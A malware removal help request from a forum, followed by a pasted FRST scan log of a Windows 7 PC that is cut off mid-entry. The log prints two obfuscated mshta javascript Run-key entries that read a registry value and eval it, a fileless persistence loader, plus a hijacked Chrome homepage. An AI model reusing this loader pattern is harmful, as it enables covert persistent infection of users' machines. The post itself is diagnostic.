rpd Posted January 26, 2016 ID:1014852 Share Posted January 26, 2016 Hi, I first noticed I had a problem when audio ads began playing in the background without any pages open. A search revealed this was likely malware. McAfee full scan detected nothing. Malwarebytes detected and removed malware, but I keep getting the notifications upon restart. Also, my school IT department contacted me alerting me to malware on the device. I would greatly appreciate any help in resolving this matter. Below is my FRST log: Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:25-01-2016Ran by Rich (administrator) on RICHPC (26-01-2016 16:22:06)Running from C:\Users\Rich\DownloadsLoaded Profiles: Rich (Available Profiles: Rich)Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)Internet Explorer Version 11 (Default browser: Chrome)Boot Mode: NormalTutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe() C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe(Microsoft Corporation) C:\Windows\System32\wlanext.exe(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe(Carbonite, Inc. (www.carbonite.com)) C:\Program Files\Carbonite\Carbonite Backup\CarboniteService.exe(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe() C:\Program Files\Intel\Intel® Smart Connect Technology Agent\iSCTAgent.exe(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe(McAfee, Inc.) C:\Windows\System32\mfevtps.exe(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe(McAfee, Inc.) C:\Windows\System32\mfevtps.exe(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe(Impulse Point, LLC) C:\Program Files (x86)\SafeConnect\scManager.sys(Validity Sensors, Inc.) C:\Windows\System32\valWBFPolicyService.exe(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe(McAfee, Inc.) C:\Program Files\mcafee\MSC\McAPExe.exe(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe(Intel Corporation) C:\Windows\System32\hkcmd.exe(Intel Corporation) C:\Windows\System32\igfxsrvc.exe(Intel Corporation) C:\Windows\System32\igfxpers.exe(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\HPSmplPass.exe() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe(Microsoft Corporation) C:\Windows\System32\StikyNot.exe(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe(Intel Corporation) C:\Program Files\Intel\Intel® Smart Connect Technology Agent\iSCTsysTray8.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe(Carbonite, Inc.) C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteUI.exe(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe(Impulse Point, LLC) C:\Program Files (x86)\SafeConnect\SafeConnectClient.exe(QFX Software Corporation) C:\Program Files (x86)\KeyScrambler\KeyScrambler.exe(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe(QFX Software Corporation) C:\Program Files (x86)\KeyScrambler\x64\KeyScrambler.exe(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe(Microsoft Corporation) C:\Windows\System32\dllhost.exe(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.6.1180.0\McCSPServiceHost.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1703424 2013-08-16] (IDT, Inc.)HKLM\...\Run: [simplePass] => C:\Program Files\Hewlett-Packard\SimplePass\HPSmplPass.exe [2758200 2013-10-14] (Hewlett-Packard)HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [155704 2013-10-14] (Hewlett-Packard)HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [155704 2013-10-14] (Hewlett-Packard)HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2774256 2013-08-01] (Synaptics Incorporated)HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2655520 2015-11-05] (NVIDIA Corporation)HKLM\...\Run: [shadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStartHKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-08-16] (Intel Corporation)HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems Incorporated)HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [127528 2015-07-08] (Hewlett-Packard Company)HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [975248 2015-09-23] (Cisco Systems, Inc.)HKLM-x32\...\Run: [Carbonite Backup] => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteUI.exe [1102544 2015-10-15] (Carbonite, Inc.)HKLM-x32\...\Run: [KeyScrambler] => C:\Program Files (x86)\KeyScrambler\keyscrambler.exe [509216 2015-10-12] (QFX Software Corporation)Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\...\Run: [**f65a0a67<*>] => mshta javascript:K9euYPxa="acG9";Lh7=new%20ActiveXObject("WScript.Shell");p51gzSotz="ng3NqRGyj";CPhf5=Lh7.RegRead("HKCU\\software\\6a3110a803\\986e17cc");IwxWI8j="m";eval(CPhf5);GRcDU4TH="J"; <===== ATTENTION (Value Name with invalid characters)HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\...\Run: [**7687f762<*>] => mshta javascript:eZ02zYETBr="V8F9";FS1=new%20ActiveXObject("WScript.Shell");CUJK2Mm="zPL4RG";VtS7o=FS1.RegRead("HKCU\\software\\6a3110a803\\986e17cc");CrvMn3hZg0="uHU";eval(VtS7o);FR8DleeMg="2Lz"; <===== ATTENTION (Value Name with invalid characters)AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [177600 2015-11-05] (NVIDIA Corporation)AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [155792 2015-11-05] (NVIDIA Corporation)ShellIconOverlayIdentifiers: [ Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2015-10-15] (Carbonite, Inc.)ShellIconOverlayIdentifiers: [ Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2015-10-15] (Carbonite, Inc.)ShellIconOverlayIdentifiers: [ Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll [2015-10-15] (Carbonite, Inc.)ShellIconOverlayIdentifiers-x32: [ Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll [2015-10-15] (Carbonite, Inc.)ShellIconOverlayIdentifiers-x32: [ Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll [2015-10-15] (Carbonite, Inc.)ShellIconOverlayIdentifiers-x32: [ Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll [2015-10-15] (Carbonite, Inc.)ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-01-19] (Microsoft Corporation)ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-01-19] (Microsoft Corporation)ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-01-19] (Microsoft Corporation)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2015-11-15]ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ISCTSystray.lnk [2014-03-02]ShortcutTarget: ISCTSystray.lnk -> C:\Program Files\Intel\Intel® Smart Connect Technology Agent\iSCTsysTray8.exe (Intel Corporation)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SafeConnect.lnk [2016-01-11]ShortcutTarget: SafeConnect.lnk -> C:\Program Files (x86)\SafeConnect\SCClient.exe (Impulse Point, LLC) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12Tcpip\..\Interfaces\{DD8BB34E-30CF-4D03-A686-1DE2F88B63AD}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12 Internet Explorer:==================HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT13/1HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT13/1HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT13/1HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-154371-11896-2/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}SearchScopes: HKLM -> {E6254F0C-E33A-46D3-A37F-5C9370ECB46D} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-154371-11896-2/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}SearchScopes: HKLM-x32 -> {E6254F0C-E33A-46D3-A37F-5C9370ECB46D} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}SearchScopes: HKU\S-1-5-21-3021336051-3703432070-3051997390-1001 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-154371-11896-2/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}SearchScopes: HKU\S-1-5-21-3021336051-3703432070-3051997390-1001 -> {E6254F0C-E33A-46D3-A37F-5C9370ECB46D} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-12-18] (Microsoft Corporation)BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2016-01-19] (Microsoft Corporation)BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-19] (Microsoft Corporation)BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No FileBHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No FileBHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2015-12-18] (Microsoft Corporation)BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2016-01-19] (Microsoft Corporation)BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-01-19] (Microsoft Corporation)BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll => No FileHandler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-11-27] (Microsoft Corporation)Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\MSC\McSnIePl64.dll [2015-08-21] (McAfee, Inc.)Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2015-08-21] (McAfee, Inc.) FireFox:========FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2015-08-21] ()FF Plugin: @microsoft.com/GENUINE -> disabled [No File]FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1203133.dll [2013-06-26] (Adobe Systems, Inc.)FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-08-09] (Intel Corporation)FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-08-09] (Intel Corporation)FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2015-08-21] ()FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-03] (Microsoft Corporation)FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-11-27] (Microsoft Corporation)FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-06] (Microsoft Corporation)FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-04] (Google Inc.)FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpiFF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpiFF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSKFF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2015-11-22] [not signed] Chrome: =======CHR HomePage: Default -> hxxp://www.default-search.net?sid=503&aid=101&itype=n&ver=13001&tm=398&src=hmpCHR StartupUrls: Default -> "hxxp://www.default-search.net?sid=503&aid=101&itype=n&ver=13001&tm=398&src=hmp"CHR Profile: C:\Users\Rich\AppData\Local\Google\Chrome\User Data\DefaultCHR Extension: (Google Docs) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-14]CHR Extension: (Google Drive) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-14]CHR Extension: (YouTube) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-14]CHR Extension: (Google Search) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-14]CHR Extension: (Turkopticon) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\dgefbojfgdddnignhmfmnencgiloojpe [2015-11-14]CHR Extension: (Zotero Connector) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekhagklcjbdpajgpjgmbionohlpdbjgc [2015-11-14]CHR Extension: (Google Sheets) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-14]CHR Extension: (SiteAdvisor) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-22]CHR Extension: (Google Docs Offline) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-14]CHR Extension: (AdBlock) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-01-20]CHR Extension: (Bookmark Manager) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-11-14]CHR Extension: (Google Scholar Button) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\ldipcbpaocekfooobnbcddclnhejkcpn [2015-11-14]CHR Extension: (Chrome Web Store Payments) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-14]CHR Extension: (Gmail) - C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-14]CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-03]CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-03] ==================== Services (Whitelisted) ======================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 Cachedrv server; C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe [109568 2013-10-14] () [File not signed]R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2787512 2015-12-22] (Microsoft Corporation)R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1156384 2015-11-05] (NVIDIA Corporation)R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [368048 2015-07-21] (McAfee, Inc.)R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-31] (Intel Corporation)R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel® Corporation) [File not signed]S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel® Corporation)R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-08-09] (Intel Corporation)R2 ISCTAgent; C:\Program Files\Intel\Intel® Smart Connect Technology Agent\iSCTAgent.exe [198120 2013-08-12] ()R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-08-09] (Intel Corporation)R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 